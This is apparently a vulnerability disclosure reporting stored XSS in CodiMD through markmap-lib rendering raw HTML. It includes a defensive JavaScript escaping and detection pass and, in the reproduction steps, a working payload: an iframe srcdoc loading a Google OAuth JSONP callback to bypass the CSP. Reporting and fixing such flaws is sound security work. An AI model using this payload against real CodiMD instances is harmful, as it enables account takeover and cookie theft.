Description
I have raised an issue with markmap about this vulnerability.
Root cause
Codimd uses markmap-lib, as documented here. However, markmap-lib allows for arbitrary HTML to be specified, thanks to the following markdown-it
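As an added illustration of the root cause (this is not CodiMD's or markmap-lib's code), the pass below treats the text of every node inside a ```markmap fence as plain text rather than HTML: it escapes raw HTML in those blocks before the note reaches a markdown-it instance that has HTML enabled, and separately reports which tags were present so a renderer can log or reject such notes. The fence convention and the function names are assumptions; the sample note is constructed.

```javascript
// Added example, not code from CodiMD or markmap-lib. Assumes notes are plain
// markdown strings and markmap content is fenced with ```markmap ... ```.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the characters that let text be interpreted as markup.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Locate every fenced markmap block; returns { start, end, body } entries.
function findMarkmapBlocks(note) {
  const blocks = [];
  const re = /^```markmap[^\n]*\n([\s\S]*?)^```[ \t]*$/gm;
  let m;
  while ((m = re.exec(note)) !== null) {
    blocks.push({ start: m.index, end: re.lastIndex, body: m[1] });
  }
  return blocks;
}

// Detection: lower-cased names of raw HTML tags found inside markmap blocks,
// including tags nested in attribute values such as an iframe's srcdoc.
function findRawHtmlTags(note) {
  const tags = new Set();
  for (const { body } of findMarkmapBlocks(note)) {
    for (const m of body.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9-]*)/g)) {
      tags.add(m[1].toLowerCase());
    }
  }
  return [...tags];
}

// Mitigation: rewrite the note so node text inside markmap blocks is escaped
// (a coarse pass: legitimate '&' or '<' in node labels are escaped too).
// Text outside markmap fences is left untouched for the normal renderer.
function neutralizeMarkmapHtml(note) {
  return note.replace(/^(```markmap[^\n]*\n)([\s\S]*?)(^```[ \t]*$)/gm,
    (_, open, body, close) => open + escapeHtml(body) + close);
}

// Constructed sample note in the shape of the report's proof of concept.
const SAMPLE_NOTE = '# note\n```markmap\n- xss: <iframe srcdoc="<script src=\'https://example.invalid/x.js\'></script>"></iframe>\n```\n';
```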
Proof-of-Concept
The proof of concept for this vulnerability can be found here
Steps to Reproduce
Step 1: Create a note with the following content. The iframe has a srcdoc that bypasses the HackMD CSP.
```markmap
- xss: <iframe srcdoc="<script src='https://accounts.google.com/o/oauth2/revoke?callback=alert(window.origin)'></script>"></iframe>
```
Step 2: View it and trigger the XSS.
Impact
This stored XSS can lead to account compromise through cookie exfiltration; the attacker can also perform any action on behalf of the user.